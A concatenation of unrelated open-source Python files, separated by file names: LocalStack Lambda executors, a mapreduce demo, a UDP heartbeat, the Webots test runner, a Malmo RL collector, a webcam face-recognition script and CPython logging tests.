if os.path.realpath(archive) != os.path.realpath(entry):
entries.append(os.path.relpath(entry, base_dir))
# make sure to append the localstack-utils.jar at the end of the classpath
# https://github.com/localstack/localstack/issues/1160
entries.append(os.path.relpath(archive, base_dir))
result = ':'.join(entries)
return result
# --------------
# GLOBAL STATE
# --------------
EXECUTOR_LOCAL = LambdaExecutorLocal()
EXECUTOR_CONTAINERS_SEPARATE = LambdaExecutorSeparateContainers()
EXECUTOR_CONTAINERS_REUSE = LambdaExecutorReuseContainers()
DEFAULT_EXECUTOR = EXECUTOR_CONTAINERS_SEPARATE
# the keys of AVAILABLE_EXECUTORS map to the LAMBDA_EXECUTOR config variable
AVAILABLE_EXECUTORS = {
'local': EXECUTOR_LOCAL,
'docker': EXECUTOR_CONTAINERS_SEPARATE,
'docker-reuse': EXECUTOR_CONTAINERS_REUSE
}
|
classmethod_demo.py | """
@author: magician
@date: 2019/12/24
@file: classmethod_demo.py
"""
import os
from threading import Thread
TEMP_DIR = '/home/magician/Project/python3/data/1.txt'
class InputData(object):
"""
InputData
"""
def read(self):
raise NotImplementedError
class PathInputData(InputData):
"""
PathInputData
"""
def __init__(self, path):
super().__init__()
self.path = path
def read(self):
return open(self.path).read()
class Worker(object):
"""
Worker
"""
def __init__(self, input_data):
self.input_data = input_data
self.result = None
def map(self):
raise NotImplementedError
def reduce(self, other):
raise NotImplementedError
class LineCountWorker(Worker):
"""
LineCountWorker
"""
def map(self):
data = self.input_data.read()
self.result = data.count('\n')
def reduce(self, other):
self.result += other.result
def generate_inputs(data_dir):
"""
generate_inputs
:param data_dir:
:return:
"""
for name in os.listdir(data_dir):
yield PathInputData(os.path.join(data_dir, name))
def create_workers(input_list):
"""
create_workers
:param input_list:
:return:
"""
workers = []
for input_data in input_list:
workers.append(LineCountWorker(input_data))
return workers
def execute(workers):
"""
execute
:param workers:
:return:
"""
threads = [Thread(target=w.map)for w in workers]
for thread in threads: thread.start()
for thread in threads: thread.join()
first, rest = workers[0], workers[1:]
for worker in workers:
first.reduce(worker)
return first.result
def mapreduce(data_dir):
"""
mapreduce
:param data_dir:
:return:
"""
inputs = generate_inputs(data_dir)
workers = create_workers(inputs)
return execute(workers)
def write_test_files(tmpdir):
"""
write_test_files
:param tmpdir:
:return:
"""
# os.write(['111'])
pass
return tmpdir
class GenericInputData(object):
"""
GenericInputData
"""
def read(self):
raise NotImplementedError
@classmethod
def generate_inputs(cls, config):
raise NotImplementedError
# class PathInputData(GenericInputData):
# """
# PathInputData
# """
# def read(self):
# return open(self.path).read()
#
# @classmethod
# def generate_inputs(cls, config):
# data_dir = config['data_dir']
# for name in os.listdir(data_dir):
# yield cls(os.path.join(data_dir, name))
# class GenericWorker(object):
# """
# GenericWorker
# """
# def map(self):
# raise NotImplementedError
#
# def reduce(self, other):
# raise NotImplementedError
#
# @classmethod
# def create_workers(cls, input_class, config):
# workers = []
#
# for input_data in input_class.generate_inputs(config):
# workers.append(cls(input_data))
#
# return workers
# def mapreduce(worker_class, input_class, config):
# """
# mapreduce
# :param worker_class:
# :param input_class:
# :param config:
# :return:
# """
# workers = worker_class.create_workers(input_class, config)
#
# return execute(workers)
if __name__ == '__main__':
with open(TEMP_DIR) as tmpdir:
write_test_files(tmpdir)
result = mapreduce(tmpdir)
print('There are', result, 'lines')
# with open(TEMP_DIR) as tmpdir:
# write_test_files(tmpdir)
# result = mapreduce(LineCountWorker, PathInputData, config)
|
HB.py | #!/usr/bin
import socket
import time
from threading import Thread
my_ip="192.168.1.14"
neighbours = ["192.168.1.19"]
nodecount=len(neighbours)
PORT = 5002
MESSAGE = "alive"
print "UDP target IP:", neighbours
print "UDP target port:", PORT
print "message:", MESSAGE
def pulse():
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
while True:
for i in range(nodecount):
sock.sendto(MESSAGE, (neighbours[i], PORT))
print("Alive sent to "+str(i))
time.sleep(1)
def sense():
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind((my_ip, PORT))
while True:
data, addr = sock.recvfrom(1024)
#couldn't figure out finding dead node
if data=='alive':
print("OK "+str(address))
'''def adapt(dir):
print("node "+str(dir)+" failed")'''
def initHB():
t1 = Thread(target=pulse)
t2 = Thread(target=sense)
t1.start()
time.sleep(1)
t2.start()
'''if __name__== "__main__":
initHB()'''
|
test_suite.py | #!/usr/bin/env python
# Copyright 1996-2020 Cyberbotics Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test suite."""
import sys
import os
import shutil
import platform
import datetime
import getpass
import glob
import subprocess
import threading
import time
import multiprocessing
from command import Command
# monitor failures
failures = 0
# parse arguments
filesArguments = []
nomakeOption = False
ansiEscape = True
if len(sys.argv) > 1:
for arg in sys.argv[1:]:
if arg == '--nomake':
nomakeOption = True
elif arg == '--no-ansi-escape':
ansiEscape = False
elif os.path.exists(arg):
filesArguments.append(arg)
else:
raise RuntimeError('Unknown option "' + arg + '"')
testGroups = ['api', 'physics', 'protos', 'parser', 'rendering']
# global files
testsFolderPath = os.environ['WEBOTS_HOME'] + os.sep + 'tests' + os.sep
outputFilename = testsFolderPath + 'output.txt'
defaultProjectPath = testsFolderPath + 'default' + os.sep
supervisorControllerName = 'test_suite_supervisor'
protoFileNames = ['TestSuiteSupervisor.proto', 'TestSuiteEmitter.proto']
tempWorldCounterFilename = testsFolderPath + 'world_counter.txt'
webotsStdOutFilename = testsFolderPath + 'webots_stdout.txt'
webotsStdErrFilename = testsFolderPath + 'webots_stderr.txt'
# Webots setup (cf. setupWebots() below)
webotsFullPath = ''
webotsVersion = ''
def setupWebots():
"""Find webots binary thanks to WEBOTS_HOME."""
os.putenv('WEBOTS_TEST_SUITE', 'TRUE')
os.putenv('WEBOTS_EMPTY_PROJECT_PATH', defaultProjectPath)
global webotsFullPath
global webotsVersion
global webotsSysInfo
if sys.platform == 'win32':
webotsFullPath = os.environ['WEBOTS_HOME'] + os.sep + 'msys64' + \
os.sep + 'mingw64' + os.sep + 'bin' + os.sep + 'webots.exe'
else:
webotsBinary = 'webots'
if 'WEBOTS_HOME' in os.environ:
webotsFullPath = os.environ['WEBOTS_HOME'] + os.sep + webotsBinary
else:
webotsFullPath = '..' + os.sep + '..' + os.sep + webotsBinary
if not os.path.isfile(webotsFullPath):
print('Error: ' + webotsBinary + ' binary not found')
if sys.platform == 'win32':
sys.stdout.flush()
sys.exit(1)
webotsFullPath = os.path.normpath(webotsFullPath)
command = Command(webotsFullPath + ' --version')
command.run()
if command.returncode != 0:
raise RuntimeError('Error when getting the Webots version')
webotsVersion = command.output.replace('\n', ' ').split(' ')[2].split('.')
command = Command(webotsFullPath + ' --sysinfo')
command.run()
if command.returncode != 0:
raise RuntimeError('Error when getting the Webots information of the system')
webotsSysInfo = command.output.split('\n')
def findFirstWorldFilename(worldsFilename):
"""Get the first world file name."""
file = open(worldsFilename)
worldFilename = file.readline().strip()
file.close()
return worldFilename
def resetIndexFile(indexFilename):
"""Create the index file."""
file = open(indexFilename, 'w')
file.write('0\n')
file.close()
def formatString(s):
"""Add a predefined number of spaces after the ':' character."""
try:
index = s.index(': ')
s0 = '{:<20}'.format(s[0:index])
s0 += s[index:]
return s0
except ValueError: # can be thrown by string.index()
return s
def resetOutputFile():
"""Create the output file."""
file = open(outputFilename, 'w')
file.write(formatString('Webots binary: ' + webotsFullPath) + '\n')
file.write(formatString('Webots version: ' + str(webotsVersion)) + '\n')
file.write(formatString(
'Operating System: ' + platform.platform() +
' [' + platform.machine() + '] ' + platform.processor() +
' (' + platform.node() + ')') + '\n'
)
file.write(formatString('Date: ' + datetime.datetime.now().ctime()) + '\n')
file.write(formatString('Tester: ' + getpass.getuser()) + '\n')
for line in webotsSysInfo:
file.write(formatString(line) + '\n')
file.close()
def appendToOutputFile(txt):
"""Append txt to output file."""
file = open(outputFilename, 'a')
file.write(txt)
file.close()
def executeMake():
"""Execute 'make release' to ensure every controller/plugin is compiled."""
curdir = os.getcwd()
os.chdir(os.path.join(os.environ['WEBOTS_HOME'], 'tests'))
command = Command('make release -j%d' % multiprocessing.cpu_count())
command.run(silent=False)
os.chdir(curdir)
if command.returncode != 0:
raise RuntimeError('Error when executing the Make command')
def generateWorldsList(groupName, worldsFilename):
"""Generate the list of worlds to run."""
f = open(worldsFilename, 'w')
worldsCount = 0
# generate the list from the arguments
if filesArguments:
for file in filesArguments:
if file.startswith(groupName):
f.write(file + '\n')
worldsCount = len(filesArguments)
# generate the list from 'ls worlds/*.wbt'
else:
filenames = glob.glob(testsFolderPath + groupName + os.sep + 'worlds' + os.sep + '*.wbt')
# remove the generic name
for filename in filenames:
if filename.endswith('test_suite'):
filenames.remove(filename)
# alphabetical order
filenames.sort()
# to file
for filename in filenames:
# speaker test not working on travis because of missing sound drivers
if not filename.endswith('_temp.wbt') and not ('TRAVIS' in os.environ and filename.endswith('speaker.wbt')):
f.write(filename + '\n')
worldsCount += 1
f.close()
return worldsCount
def monitorOutputFile(finalMessage):
"""Display the output file on the console."""
global monitorOutputCommand
monitorOutputCommand = Command('tail -f ' + outputFilename, ansiEscape)
monitorOutputCommand.run(expectedString=finalMessage, silent=False)
if not nomakeOption:
executeMake()
setupWebots()
resetOutputFile()
finalMessage = 'Test suite complete'
thread = threading.Thread(target=monitorOutputFile, args=[finalMessage])
thread.start()
webotsArguments = '--mode=fast --stdout --stderr --minimize --batch'
if sys.platform != 'win32':
webotsArguments += ' --no-sandbox'
for groupName in testGroups:
testFailed = False
appendToOutputFile('\n### ' + groupName + ' test\n\n')
# clear stdout and stderr files
open(webotsStdErrFilename, 'w').close()
open(webotsStdOutFilename, 'w').close()
worldsFilename = testsFolderPath + groupName + os.sep + 'worlds.txt'
indexFilename = testsFolderPath + groupName + os.sep + 'worlds_index.txt'
# init temporary world counter file
tempFile = open(tempWorldCounterFilename, 'w')
tempFile.write('0')
tempFile.close()
supervisorTargetDirectory = testsFolderPath + groupName + os.sep + 'controllers' + os.sep + \
supervisorControllerName
if not os.path.exists(supervisorTargetDirectory):
os.makedirs(supervisorTargetDirectory)
shutil.copyfile(
defaultProjectPath + 'controllers' + os.sep +
supervisorControllerName + os.sep +
supervisorControllerName + '.py',
supervisorTargetDirectory + os.sep + supervisorControllerName + '.py'
)
# parser tests uses a slightly different Supervisor PROTO
protosTargetDirectory = testsFolderPath + groupName + os.sep + 'protos'
protosSourceDirectory = defaultProjectPath + 'protos' + os.sep
if not os.path.exists(protosTargetDirectory):
os.makedirs(protosTargetDirectory)
for protoFileName in protoFileNames:
shutil.copyfile(protosSourceDirectory + protoFileName,
protosTargetDirectory + os.sep + protoFileName)
worldsCount = generateWorldsList(groupName, worldsFilename)
firstSimulation = findFirstWorldFilename(worldsFilename)
if not os.path.exists(firstSimulation):
continue
resetIndexFile(indexFilename)
# Here is an example to run webots in gdb and display the stack
# when it crashes.
# this is particuarliy useful to debug on the jenkins server
# command = Command('gdb -ex run --args ' + webotsFullPath + '-bin ' +
# firstSimulation + ' --mode=fast --minimize')
# command.run(silent = False)
command = Command(webotsFullPath + ' ' + firstSimulation + ' ' + webotsArguments)
# redirect stdout and stderr to files
command.runTest(timeout=10 * 60) # 10 minutes
if command.isTimeout or command.returncode != 0:
if command.isTimeout:
failures += 1
appendToOutputFile(
'FAILURE: Webots has been terminated ' +
'by the test suite script\n')
else:
failures += 1
appendToOutputFile(
'FAILURE: Webots exits abnormally with this error code: ' +
str(command.returncode) + '\n')
testFailed = True
else:
# check count of executed worlds
tempFile = open(tempWorldCounterFilename)
counterString = tempFile.read()
tempFile.close()
if int(counterString) < worldsCount:
testFailed = True
appendToOutputFile('FAILURE: Some tests have not been executed\n')
appendToOutputFile('- expected number of worlds: %d\n' % (worldsCount))
appendToOutputFile('- number of worlds actually tested: %s)\n' % (counterString))
else:
with open(webotsStdErrFilename, 'r') as file:
if 'Failure' in file.read():
failures += 1
if testFailed:
appendToOutputFile('\nWebots complete STDOUT log:\n')
with open(webotsStdOutFilename) as f:
for line in f:
appendToOutputFile(line)
appendToOutputFile('\nWebots complete STDERR log:\n')
with open(webotsStdErrFilename) as f:
for line in f:
appendToOutputFile(line)
if '(core dumped)' in line:
l = line[0:line.find(' Segmentation fault')]
pid = int(l[l.rfind(' ') + 1:])
core_dump_file = '/tmp/core_webots-bin.' + str(pid)
if os.path.exists(core_dump_file):
appendToOutputFile(subprocess.check_output([
'gdb', '--batch', '--quiet', '-ex', 'bt', '-ex',
'quit', '../bin/webots-bin', core_dump_file
]))
os.remove(core_dump_file)
else:
appendToOutputFile(
'Cannot get the core dump file: "%s" does not exist.' % core_dump_file
)
appendToOutputFile('\n' + finalMessage + '\n')
time.sleep(1)
if monitorOutputCommand.isRunning():
monitorOutputCommand.terminate(force=True)
with open(outputFilename, 'r') as file:
content = file.read()
failures += content.count('FAILURE ')
sys.exit(failures)
|
collect_transitions.py | # Village People, 2017
#
# !! ATTENTION: IPS are written below and they not taken from some
# !! Fancy yaml file !!
import torch
import torch.multiprocessing as mp
from multiprocessing import Queue
from copy import deepcopy
from termcolor import colored as clr
from utils import read_config
from models import get_model
from worker_scripts import collect_from_malmo, train_from_malmo
from worker_scripts import predict_for_malmo
USE_PREDICTOR = False
LAN_IPS = [
# Doar patru
# ("172.19.3.173", [(10000, 10001)]),
# ("172.19.3.236", [(10000, 10001)]),
# ("172.19.3.232", [(10000, 10001)]),
# ("172.19.3.234", [(10000, 10001)]),
# Doar opt
# ("172.19.3.173", [(10000, 10001)]),
# ("172.19.3.236", [(10000, 10001)]),
# ("172.19.3.232", [(10000, 10001)]),
# ("172.19.3.234", [(10000, 10001)]),
# ("172.19.3.234", [(10000, 10001)]),
# ("172.19.3.230", [(10000, 10001)]),
# ("172.19.3.229", [(10000, 10001)]),
# ("172.19.3.240", [(10000, 10001)]),
# ("172.19.3.240", [(10000, 10001)]),
# doispe
# ("172.19.3.173", [(10000, 10001)]),
# ("172.19.3.236", [(10000, 10001)]),
# ("172.19.3.232", [(10000, 10001)]),
# ("172.19.3.234", [(10000, 10001)]),
# ("172.19.3.234", [(10000, 10001)]),
# ("172.19.3.230", [(10000, 10001)]),
# ("172.19.3.229", [(10000, 10001)]),
# ("172.19.3.240", [(10000, 10001)]),
# ("172.19.3.240", [(10000, 10001)]),
#
# ("172.19.3.196", [(10000, 10001), (10002, 10003)]),
# ("172.19.3.201", [(10000, 10001), (10002, 10003)]),
# optspe
# ("172.19.3.173", [(10000, 10001), (10002, 10003), (10004, 10005)]),
# ("172.19.3.236", [(10000, 10001), (10002, 10003), (10004, 10005)]),
# ("172.19.3.235", [(10000, 10001), (10002, 10003), (10004, 10005)]),
# ("172.19.3.232", [(10000, 10001), (10002, 10003), (10004, 10005)]),
# ("172.19.3.234", [(10000, 10001), (10002, 10003), (10004, 10005)])
# ("172.19.3.173", [(10000, 10001), (10002, 10003), (10004, 10005)])
# Toate
# Local host
("192.168.0.100", [(10000, 10001), (10002, 10003), (10004, 10005)]),
("192.168.0.102", [(10000, 10001), (10002, 10003), (10004, 10005)]),
("192.168.0.101", [(10000, 10001), (10002, 10003), (10004, 10005)]),
#("172.19.3.209", [(10000, 10001), (10002, 10003), (10004, 10005)]),
#("172.19.3.240", [(10000, 10001), (10002, 10003), (10004, 10005)])
# ("172.19.3.173", [(10000, 10001), (10002, 10003), (10004, 10005)]),
# ("172.19.3.236", [(10000, 10001), (10002, 10003), (10004, 10005)]),
# ("172.19.3.232", [(10000, 10001), (10002, 10003), (10004, 10005)]),
# ("172.19.3.234", [(10000, 10001), (10002, 10003), (10004, 10005)]),
# ("172.19.3.230", [(10000, 10001), (10002, 10003), (10004, 10005)]),
# ("172.19.3.229", [(10000, 10001), (10002, 10003), (10004, 10005)]),
# #
# ("172.19.3.240", [(10000, 10001), (10002, 10003), (10004, 10005)]),
# ("172.19.3.196", [(10000, 10001), (10002, 10003), (10004, 10005)]),
# ("172.19.3.201", [(10000, 10001), (10002, 10003), (10004, 10005)]),
# # ("172.19.3.189", [(10000, 10001)]),
# ("172.19.3.208", [(10000, 10001)]),
# ("172.19.3.190", [(10000, 10001)])
]
HOSTS = []
for ip, pairs in LAN_IPS:
HOSTS.extend([[(ip, p1), (ip, p2)] for (p1, p2) in pairs])
def print_info(message):
print(clr("[COLLECT-MAIN] ", "yellow") + message)
def immortal_collector(_id, shared_objects, cfg):
while True:
shared_objects["model"].share_memory()
collector2 = mp.Process(target=collect_from_malmo,
args=(_id, shared_objects, cfg))
collector2.start()
collector2.join()
if __name__ == "__main__":
print_info("Booting...")
cfg = read_config()
# -- Configure Torch
if cfg.general.seed > 0:
torch.manual_seed(cfg.general.seed)
if cfg.general.use_cuda:
torch.cuda.manual_seed_all(cfg.general.seed)
if cfg.general.use_cuda:
print_info("Using CUDA.")
else:
print_info("No GPU for you, Sir!")
mp.set_start_method("spawn")
print_info("Torch setup finished.")
# -- Configure model
shared_model = get_model(cfg.model.name)(cfg.model)
if cfg.general.use_cuda:
shared_model.cuda()
shared_model.share_memory()
print_info("Shared model {:s} initalized.".format(
clr(cfg.model.name, "red"))
)
if isinstance(cfg.model.load, str):
checkpoint = torch.load(cfg.model.load)
iteration = checkpoint['iteration']
reward = checkpoint['reward']
print("LOADING MODEL: {} ---> MAX R: {}".format(cfg.model.load, reward))
shared_model.load_state_dict(checkpoint['state_dict'])
#
# -- Shared objects
shared_objects = {
"model": shared_model,
"queue": mp.Queue(),
"reset": mp.Value("i", 0),
"session": mp.Value("i", 0)
}
# -- Create predictor
if USE_PREDICTOR:
recv_queues, send_queues = {}, {}
for i in range(len(HOSTS)):
recv_queues[i], send_queues[i] = mp.Pipe()
shared_objects["send_back_queues"] = send_queues
shared_objects["predict_queue"] = mp.Queue()
predictor = mp.Process(target=predict_for_malmo,
args=(shared_objects, deepcopy(cfg)))
# -- Create players
collectors = []
for _id, hosts in enumerate(HOSTS):
cfg.envs.minecraft.ports = hosts
cfg.agent.mode = "collect"
if USE_PREDICTOR:
shared_objects["answer_pipe"] = recv_queues
collector = mp.Process(target=collect_from_malmo,
args=(_id, shared_objects, deepcopy(cfg)))
collectors.append(collector)
# -- Create trainer
cfg.agent.mode = "train_from_queue"
trainer = mp.Process(target=train_from_malmo, args=(shared_objects, cfg))
# -- Start all
if USE_PREDICTOR:
predictor.start()
for c in collectors:
c.start()
trainer.start()
# -- Finished
trainer.join()
for c in collectors:
c.join()
print_info("Done")
|
real_time_face_recognition.py | # coding=utf-8
"""Performs face detection in realtime.
Based on code from https://github.com/shanren7/real_time_face_recognition
"""
# MIT License
#
# Copyright (c) 2017 François Gervais
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import argparse
import sys
import time
import cv2
from threading import Thread
import face
import memcache
face_recognition = None
face_det = None
current_detected = memcache.Client(['127.0.0.1:11211'], debug=0)
def add_overlays(frame, faces, frame_rate):
global face_det
global current_detected
# if faces is not None:
# for face in faces:
# face_bb = face.bounding_box.astype(int)
# cv2.rectangle(frame,
# (face_bb[0], face_bb[1]), (face_bb[2], face_bb[3]),
# (0, 0, 0), 1)
# if face.name is not None:
# if face.confidence <= 0.85:
# face.name = ''
# current_detected = face.name
# cv2.putText(frame, face.name, (face_bb[0], face_bb[3]),
# cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 0),
# thickness=2, lineType=2)
# cv2.putText(frame, (face.confidence * 100).astype(str) + "%", (face_bb[0], face_bb[1]),
# cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 255, 0),
# thickness=2, lineType=2)
# cv2.putText(frame, str(frame_rate) + " fps", (10, 30),
# cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 0),
# thickness=2, lineType=2)
if faces is not None:
if len(faces) > 0:
face_bb = faces[0].bounding_box.astype(int)
cv2.rectangle(frame,
(face_bb[0], face_bb[1]), (face_bb[2], face_bb[3]),
(0, 0, 0), 1)
if faces[0].name is not None:
if faces[0].confidence <= 0.85:
faces[0].name = ''
#current_detected = faces[0].name
current_detected.set('Name', faces[0].name)
cv2.putText(frame, faces[0].name, (face_bb[0], face_bb[3]),
cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 0),
thickness=2, lineType=2)
cv2.putText(frame, (faces[0].confidence * 100).astype(str) + "%", (face_bb[0], face_bb[1]),
cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 255, 0),
thickness=2, lineType=2)
else:
current_detected.set('Name', '')
cv2.putText(frame, str(frame_rate) + " fps", (10, 30),
cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 0),
thickness=2, lineType=2)
def main(args):
global face_recognition
global face_det
frame_interval = 2 # Number of frames after which to run face detection
fps_display_interval = 3 # seconds
frame_rate = 0
frame_count = 0
video_capture = cv2.VideoCapture(0)
face_recognition = face.Recognition()
start_time = time.time()
video_capture.set(28, 0)
#if args.debug:
while True:
# Capture frame-by-frame
ret, frame = video_capture.read()
#img = cv2.imread(frame)
if (frame_count % frame_interval) == 0:
Thread(target=face_reg_wrapper,
args=(frame, )
).start()
#print(face_det)
#faces = face_recognition.identify(frame)
# Check our current fps
end_time = time.time()
if (end_time - start_time) > fps_display_interval:
frame_rate = int(frame_count / (end_time - start_time))
start_time = time.time()
frame_count = 0
add_overlays(frame, face_det, frame_rate)
frame_count += 1
cv2.imshow('Video', frame)
k = cv2.waitKey(1)
if k == ord('q'):
break
elif k == ord('r'):
Thread(target=retrain_wrapper, verbose=True).start()
continue
elif k == ord('d'):
current_person()
continue
# When everything is done, release the capture
video_capture.release()
cv2.destroyAllWindows()
def current_person():
global current_detected
print (current_detected.get('Name'))
return current_detected
def face_reg_wrapper(frame):
global face_recognition
global face_det
#print(frame)
#print("recognizing faces")
#cv2.imshow("test", frame)
face_det = face_recognition.identify(frame)
#print(faces)
#return face_recognition.identify(frame)
def retrain_wrapper():
global face_recognition
face_recognition.encoder.retrain_model(incremental=True)
def parse_arguments(argv):
parser = argparse.ArgumentParser()
parser.add_argument('--debug', action='store_true',
help='Enable some debug outputs.')
return parser.parse_args(argv)
if __name__ == '__main__':
main(parse_arguments(sys.argv[1:]))
|
test_logging.py | # Copyright 2001-2013 by Vinay Sajip. All Rights Reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose and without fee is hereby granted,
# provided that the above copyright notice appear in all copies and that
# both that copyright notice and this permission notice appear in
# supporting documentation, and that the name of Vinay Sajip
# not be used in advertising or publicity pertaining to distribution
# of the software without specific, written prior permission.
# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""Test harness for the logging module. Run all tests.
Copyright (C) 2001-2013 Vinay Sajip. All Rights Reserved.
"""
import logging
import logging.handlers
import logging.config
import codecs
import cPickle
import cStringIO
import gc
import json
import os
import random
import re
import select
import socket
from SocketServer import ThreadingTCPServer, StreamRequestHandler
import struct
import sys
import tempfile
from test.test_support import captured_stdout, run_with_locale, run_unittest
import textwrap
import time
import unittest
import warnings
import weakref
try:
import threading
except ImportError:
threading = None
class BaseTest(unittest.TestCase):
"""Base class for logging tests."""
log_format = "%(name)s -> %(levelname)s: %(message)s"
expected_log_pat = r"^([\w.]+) -> ([\w]+): ([\d]+)$"
message_num = 0
def setUp(self):
"""Setup the default logging stream to an internal StringIO instance,
so that we can examine log output as we want."""
logger_dict = logging.getLogger().manager.loggerDict
logging._acquireLock()
try:
self.saved_handlers = logging._handlers.copy()
self.saved_handler_list = logging._handlerList[:]
self.saved_loggers = logger_dict.copy()
self.saved_level_names = logging._levelNames.copy()
finally:
logging._releaseLock()
# Set two unused loggers: one non-ASCII and one Unicode.
# This is to test correct operation when sorting existing
# loggers in the configuration code. See issue 8201.
logging.getLogger("\xab\xd7\xbb")
logging.getLogger(u"\u013f\u00d6\u0047")
self.root_logger = logging.getLogger("")
self.original_logging_level = self.root_logger.getEffectiveLevel()
self.stream = cStringIO.StringIO()
self.root_logger.setLevel(logging.DEBUG)
self.root_hdlr = logging.StreamHandler(self.stream)
self.root_formatter = logging.Formatter(self.log_format)
self.root_hdlr.setFormatter(self.root_formatter)
self.root_logger.addHandler(self.root_hdlr)
def tearDown(self):
"""Remove our logging stream, and restore the original logging
level."""
self.stream.close()
self.root_logger.removeHandler(self.root_hdlr)
while self.root_logger.handlers:
h = self.root_logger.handlers[0]
self.root_logger.removeHandler(h)
h.close()
self.root_logger.setLevel(self.original_logging_level)
logging._acquireLock()
try:
logging._levelNames.clear()
logging._levelNames.update(self.saved_level_names)
logging._handlers.clear()
logging._handlers.update(self.saved_handlers)
logging._handlerList[:] = self.saved_handler_list
loggerDict = logging.getLogger().manager.loggerDict
loggerDict.clear()
loggerDict.update(self.saved_loggers)
finally:
logging._releaseLock()
def assert_log_lines(self, expected_values, stream=None):
"""Match the collected log lines against the regular expression
self.expected_log_pat, and compare the extracted group values to
the expected_values list of tuples."""
stream = stream or self.stream
pat = re.compile(self.expected_log_pat)
try:
stream.reset()
actual_lines = stream.readlines()
except AttributeError:
# StringIO.StringIO lacks a reset() method.
actual_lines = stream.getvalue().splitlines()
self.assertEqual(len(actual_lines), len(expected_values))
for actual, expected in zip(actual_lines, expected_values):
match = pat.search(actual)
if not match:
self.fail("Log line does not match expected pattern:\n" +
actual)
self.assertEqual(tuple(match.groups()), expected)
s = stream.read()
if s:
self.fail("Remaining output at end of log stream:\n" + s)
def next_message(self):
"""Generate a message consisting solely of an auto-incrementing
integer."""
self.message_num += 1
return "%d" % self.message_num
class BuiltinLevelsTest(BaseTest):
"""Test builtin levels and their inheritance."""
def test_flat(self):
#Logging levels in a flat logger namespace.
m = self.next_message
ERR = logging.getLogger("ERR")
ERR.setLevel(logging.ERROR)
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
DEB = logging.getLogger("DEB")
DEB.setLevel(logging.DEBUG)
# These should log.
ERR.log(logging.CRITICAL, m())
ERR.error(m())
INF.log(logging.CRITICAL, m())
INF.error(m())
INF.warn(m())
INF.info(m())
DEB.log(logging.CRITICAL, m())
DEB.error(m())
DEB.warn (m())
DEB.info (m())
DEB.debug(m())
# These should not log.
ERR.warn(m())
ERR.info(m())
ERR.debug(m())
INF.debug(m())
self.assert_log_lines([
('ERR', 'CRITICAL', '1'),
('ERR', 'ERROR', '2'),
('INF', 'CRITICAL', '3'),
('INF', 'ERROR', '4'),
('INF', 'WARNING', '5'),
('INF', 'INFO', '6'),
('DEB', 'CRITICAL', '7'),
('DEB', 'ERROR', '8'),
('DEB', 'WARNING', '9'),
('DEB', 'INFO', '10'),
('DEB', 'DEBUG', '11'),
])
def test_nested_explicit(self):
# Logging levels in a nested namespace, all explicitly set.
m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
# These should log.
INF_ERR.log(logging.CRITICAL, m())
INF_ERR.error(m())
# These should not log.
INF_ERR.warn(m())
INF_ERR.info(m())
INF_ERR.debug(m())
self.assert_log_lines([
('INF.ERR', 'CRITICAL', '1'),
('INF.ERR', 'ERROR', '2'),
])
def test_nested_inherited(self):
#Logging levels in a nested namespace, inherited from parent loggers.
m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
INF_UNDEF = logging.getLogger("INF.UNDEF")
INF_ERR_UNDEF = logging.getLogger("INF.ERR.UNDEF")
UNDEF = logging.getLogger("UNDEF")
# These should log.
INF_UNDEF.log(logging.CRITICAL, m())
INF_UNDEF.error(m())
INF_UNDEF.warn(m())
INF_UNDEF.info(m())
INF_ERR_UNDEF.log(logging.CRITICAL, m())
INF_ERR_UNDEF.error(m())
# These should not log.
INF_UNDEF.debug(m())
INF_ERR_UNDEF.warn(m())
INF_ERR_UNDEF.info(m())
INF_ERR_UNDEF.debug(m())
self.assert_log_lines([
('INF.UNDEF', 'CRITICAL', '1'),
('INF.UNDEF', 'ERROR', '2'),
